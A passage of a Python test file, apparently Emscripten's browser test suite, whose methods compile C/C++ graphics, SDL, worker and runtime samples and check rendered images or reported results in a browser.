self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'], also_proxied=True)
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
for opts in [0, 1]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=['-O' + str(opts), 'side.c', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', reference='htmltest.png')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1'])
def test_s3tc_crunch(self):
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print 'passed asm test'
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_runtimelink(self):
return self.skip('BUILD_AS_SHARED_LIB=2 is deprecated')
main, supp = self.setup_runtimelink_test()
open(self.in_dir('supp.cpp'), 'w').write(supp)
Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))
self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
Module.print('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
Module.print('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
Module.print('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
Module.print('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(Module['_free'], 1000); // free is valid to call even after the runtime closes
'''
open('pre_main.js', 'w').write(r'''
Module._main = function(){
myJSCallback();
return 0;
};
''')
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_main.js'], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
print '\n', filename, extra_args
print 'mem init, so async, call too early'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1'] + extra_args)
print 'sync startup, call too late'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args)
print 'sync, runtime still alive, so all good'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=1'] + extra_args)
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
def test_module(self):
def nfc():
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
nonfastcomp(nfc)
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'])
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--list_browsers'])
assert 'Traceback' not in result
def test_emrun(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_exit.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt'), os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
if emscripten_browser is not None:
args += ['--browser', emscripten_browser]
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'hello, error stream!' in stderr
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print out
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1')
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (typeof Module === 'undefined') Module = eval('(function() { try { return Module || {} } catch(e) { return {} } })()');
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
Module['addRunDependency']('test_run_dependency');
Module['removeRunDependency']('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0')
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts, expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_codemods(self):
for opt_level in [0, 2]:
print 'opt level', opt_level
opts = '-O' + str(opt_level)
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2']) # empty polyfill, but browser has support, so semantics are like float
# now use a shell to remove the browser's fround support
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', '''
Math.fround = null;
var Module = {
'''))
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=2']) # empty polyfill, no browser support, so semantics are like double
# finally, remove fround, patch up fround as the code executes (after polyfilling etc.), to verify that we got rid of it entirely on the client side
fixer = 'python fix.py'
open('fix.py', 'w').write(r'''
import sys
filename = sys.argv[1]
js = open(filename).read()
replaced = js.replace("var Math_fround = Math.fround;", "var Math_fround = Math.fround = function(x) { return 0; }")
assert js != replaced
open(filename, 'w').write(replaced)
''')
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer]) # no fround anyhow
self.btest(path_from_root('tests', 'codemods.cpp'), expected='121378', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=1']) # proper polyfill was enstated, then it was replaced by the fix so 0 is returned all the time, hence a different result here
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=2']) # we should remove the calls to the polyfill ENTIRELY here, on the clientside, so we should NOT see any calls to fround here, and result should be like double
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
def test_locate_file(self):
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT();
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html']).communicate()
os.mkdir('sub')
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
def test_glfw3(self):
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_glfw3_events(self):
self.btest(path_from_root('tests', 'glfw3_events.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['_main'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=['-s', 'SWAPPABLE_ASM_MODULE=1', '-s', 'NO_EXIT_RUNTIME=1', '--pre-js', 'run.js'] + opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?7436429')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
